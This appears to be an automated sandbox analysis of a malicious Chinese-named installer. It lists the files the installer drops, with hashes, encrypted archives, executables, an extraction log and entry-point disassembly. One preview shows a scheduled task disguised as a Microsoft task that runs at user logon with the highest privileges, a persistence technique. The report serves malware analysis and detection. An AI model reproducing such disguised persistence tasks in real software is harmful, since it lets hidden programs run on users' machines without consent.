                            Size (bytes):29730
                            Entropy (8bit):7.994290657653607
                            Encrypted:true
                            SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                            MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                            SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                            SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                            SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                            Malicious:false
                            Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653608
                            Encrypted:true
                            SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                            MD5:A9C8A3E00692F79E1BA9693003F85D18
                            SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                            SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                            SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                            Malicious:false
                            Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):2603681
                            Entropy (8bit):7.999925048660142
                            Encrypted:true
                            SSDEEP:49152:LTl/YfOFTVDpw1I8zwTR8K4jZ4O2WLHPyoSnxD14cI7jnyODI6MXpqg4fy:LFyd6RC4+OoGU7jyO7MXQg4fy
                            MD5:58D8EBB349687B1D6069F6413C7E0391
                            SHA1:4D235DCCE39C99DD182D660964CE1EBA66427B06
                            SHA-256:5D181A626C632CFDAA81340AC6AC005EBA31A35BF69C7977D202E7F8F29D29AE
                            SHA-512:D421B3365A60FA10681B55BFEE5AC3C390EE48BFA4ACA1FF853A468FF6E64BF25FD837D7D93139AD3FF43C25DA21EADE791C6FE0B18D762D9D7D1FC06C0635C8
                            Malicious:false
                            Preview:7z..'.......@.'.....A........q._t.....5oO./`..`.6C.+.*......2y@.B....Ni@..l;.).Uc....w.....I4..CfW'.G.|1.I?..]..>%Ue.(.DX..?...[..q8.I3.n.8.'Up..(......~R. c........U.3i.s...*.3]........c..............LO....Ax.P..S..6o.E....r.p.&c......p.d..`.......y3..0...m(.G$"hNfR...y.I..S.j..{O..d<._.^.X.....{..+.#.@....s.]t.Nx......WWlJ.......=%i7jS..&.S..R.....Z.A...Kdb...w.#o....N....\...@.wy...+..A...S..r?...w..[........:..a..W%.~}:....;..Y..lA.../(9x......e.2......4S..W.o..Z.'....&N..I..f..{.._j|5.B.....W-..............O.-.x..T.Q.sS.5x.v.p....k]bMG!.+......;.....\!....9..S.Q.?).RM.....>. ..k.\,b.<,+.L...v.....p..J....c.....r......9..........S...........n...1~..6........r.x;.......g.g..b.Z@.."..+..u...P...oE...r.m....c.e.P...1...2.v......1\+-.../.I1..M..Y..K..~.%.......&e..(.....r....4PJ.i+.D..@..Q.%.(.....s.$..S...,.=.L.e..K...2.$.6..C....=BJ.O....q..O#...;....N.7e..(...,BJ..E.......6.h....u.Jg@.k..|..$Qf.2.L...A.h.I]...[.... _o7ID.R...-. .)C.$..21...v...>..
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):63640
                            Entropy (8bit):6.482810107683822
                            Encrypted:false
                            SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                            MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                            SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                            SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                            SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 9%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):3.3449406240731085
                            Encrypted:false
                            SSDEEP:48:dXKLzDlnDPLL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnDP6whldOVQOj6dKbKsz7
                            MD5:1EA10B1FA76DC2F1967E53A3FC2D43C4
                            SHA1:23EADA9D0994D5B9ADE7878493C44551C0B5CF44
                            SHA-256:2748447EBDE83E35B8984D2993A8331DAC7B7924638502024D8531A07E74C63C
                            SHA-512:15BF2663CEF3905AE3B13D0A4ABC2E3BBF1FF213BCA5C568641978D5548A7DBED2EC7FC5A00B330287E90DF675EFB804613D4801F6995C7748840CC0BCBA637F
                            Malicious:false
                            Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAv
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:OpenPGP Secret Key
                            Category:dropped
                            Size (bytes):2353553
                            Entropy (8bit):7.99992611421159
                            Encrypted:true
                            SSDEEP:49152:rtfmdyArF7jC2uzD04c4vtHlkTmMVDfFv3ARw3ieIXzFj0nHfh:roDrBKxxlkq0fNAW3ieIXzuZ
                            MD5:73616E6FB705D7163A2D8A391DDCAD6C
                            SHA1:2ADEE96903C346D920E7B7B7527BE089F8388D87
                            SHA-256:4AE1FF98AEC7817FF9E35A15118CFBD61CCF00C766ABE08C4EEFB58889EDF04E
                            SHA-512:74D4726E6593783D062AFB2703C1B6465019C247DD2468B657AD95413BC4A3707F9D2695D9BE3CA51C9590A28C3ED22DDC52615F10F742A4432CD3A72A3A18FD
                            Malicious:false
                            Preview:....;.3......v.D.8.Wg..y.v.....u....Bwa...]`t...~..-..n.........9l..v.I}gwwT..7H.t?..6.G.x.-'7....]$...iq~....J`........$...(..m.z....,y..2C7.?...O...D.._..dP.&;....n .....a..l...#R......K.[&.eb.\&B..M..d .[.<.t\..W..,$........;@..........?.x..$+..Z...:.f....i.WL'..g .Xv1V....[f..._........+'.T.9..%...../v_)...G0........`(.J1+....U.l.9..2........Y..._K.....z.-......$..@E..c.J..c....B....h.;.5..2*I7>....e.L...R..M.0"jz'.....g......:...A.?s...]C3?.%.....;.."..1........\Q...d+..Z...:-..M.Q.o.P...Y...`%O..I.f?.Kb...2./'].?Qq....+f..)..g*["9.0.S..T+A...Z..v....Y...uR(.....3....&kD....D.+..v......Of,.D....Vz.9.9jZ.d...f...c..m.[Y....|5.jV.....Oq...5.t|.. N.P..~...a...5.......3.<++'...=..<.....l..!_.o9L.:..y..g.T.\...H.@....../t..<L.F.q1..B.!.9+|.s}e4.j*Zbg_W..t..{.&xY.q.8.=M...8.O..x..._]6h%....g.....~.O..........$..p.~!.E[.*!.+b.EH.......)..2.).KH.....(p...%u......!.t\+.....R. .$.ir...m.L+IC...OD....:26..y.j.x<L.?u.R.........x...........[.
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1940658735648508
                            Encrypted:false
                            SSDEEP:3:Nlllul/nq/llh:NllUyt
                            MD5:AB80AD9A08E5B16132325DF5584B2CBE
                            SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                            SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                            SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                            Malicious:false
                            Preview:@...e................................................@..........
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:false
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530564726182663
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:F0D4EEA505CEB561AB4AD622E3C0B9D5
                            SHA1:70CB1C9B1E2A3B544A587225AB9D8AADB7B72395
                            SHA-256:1881A519E644331856A6B867FC1827BB2AFF3D7D3046CB745E1A73934354C539
                            SHA-512:0FAC2790242C0D65F541B0EBA14C411E505CC0C50166A289E478525C56FA845C6AF115E51993C3739358367DE3C47E1044A9CC4237F8149A8ABD637F30269058
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:false
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530564726182663
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:F0D4EEA505CEB561AB4AD622E3C0B9D5
                            SHA1:70CB1C9B1E2A3B544A587225AB9D8AADB7B72395
                            SHA-256:1881A519E644331856A6B867FC1827BB2AFF3D7D3046CB745E1A73934354C539
                            SHA-512:0FAC2790242C0D65F541B0EBA14C411E505CC0C50166A289E478525C56FA845C6AF115E51993C3739358367DE3C47E1044A9CC4237F8149A8ABD637F30269058
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):406
                            Entropy (8bit):5.117520345541057
                            Encrypted:false
                            SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                            MD5:9200058492BCA8F9D88B4877F842C148
                            SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                            SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                            SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                            Malicious:false
                            Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.95914765295349
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 98.04%
                            • Inno Setup installer (109748/4) 1.08%
                            • InstallShield setup (43055/19) 0.42%
                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            File name:#U5b89#U88c5#U52a9#U624b1.0.1.exe
                            File size:8'595'621 bytes
                            MD5:f2845d6410a0d9a090d414f3ae742e3b
                            SHA1:a27e62687254f001c08b5313465d2ed1870f0eb5
                            SHA256:f56c3d038c408355f6fb191865ca5650b29926f65b78d02b008b509bf640e588
                            SHA512:48261d07b5f44f89414ceca11345413f97388e78a5d7f9dd56bf2a4520083150d9fe20ac11160274f457cfadb0b4bfea685135cb1f1ed2da288a488085a738c6
                            SSDEEP:196608:lWLc3zOIl9n+GOdz13XOJqJfWovaeOTX8I0JGZI24j:lWLiqGn+B3X6O+ovEsIm
                            TLSH:2E862213F2CBD43EE45E0B3B15B2A25454FB7A256826AE5386ECB4ECCF250501D3E64B
                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                            Icon Hash:0c0c2d33ceec80aa
                            Entrypoint:0x4a83bc
                            Entrypoint Section:.itext
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:1
                            File Version Major:6
                            File Version Minor:1
                            Subsystem Version Major:6
                            Subsystem Version Minor:1
                            Import Hash:40ab50289f7ef5fae60801f88d4541fc
                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFA4h
                            push ebx
                            push esi
                            push edi
                            xor eax, eax
                            mov dword ptr [ebp-3Ch], eax
                            mov dword ptr [ebp-40h], eax
                            mov dword ptr [ebp-5Ch], eax
                            mov dword ptr [ebp-30h], eax
                            mov dword ptr [ebp-38h], eax
                            mov dword ptr [ebp-34h], eax
                            mov dword ptr [ebp-2Ch], eax
                            mov dword ptr [ebp-28h], eax
                            mov dword ptr [ebp-14h], eax
                            mov eax, 004A2EBCh
                            call 00007FD4C540CE65h
                            xor eax, eax
                            push ebp
                            push 004A8AC1h
                            push dword ptr fs:[eax]
                            mov dword ptr fs:[eax], esp
                            xor edx, edx
                            push ebp
                            push 004A8A7Bh
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            mov eax, dword ptr [004B0634h]
                            call 00007FD4C549E7EBh
                            call 00007FD4C549E33Eh
                            lea edx, dword ptr [ebp-14h]
                            xor eax, eax
                            call 00007FD4C5499018h
                            mov edx, dword ptr [ebp-14h]
                            mov eax, 004B41F4h
                            call 00007FD4C5406F13h
                            push 00000002h
                            push 00000000h
                            push 00000001h
                            mov ecx, dword ptr [004B41F4h]
                            mov dl, 01h
                            mov eax, dword ptr [0049CD14h]
                            call 00007FD4C549A343h
                            mov dword ptr [004B41F8h], eax
                            xor edx, edx
                            push ebp
                            push 004A8A27h
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            call 00007FD4C549E873h
                            mov dword ptr [004B4200h], eax
                            mov eax, dword ptr [004B4200h]
                            cmp dword ptr [eax+0Ch], 01h
                            jne 00007FD4C54A555Ah
                            mov eax, dword ptr [004B4200h]
                            mov edx, 00000028h
                            call 00007FD4C549AC38h
                            mov edx, dword ptr [004B4200h]
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
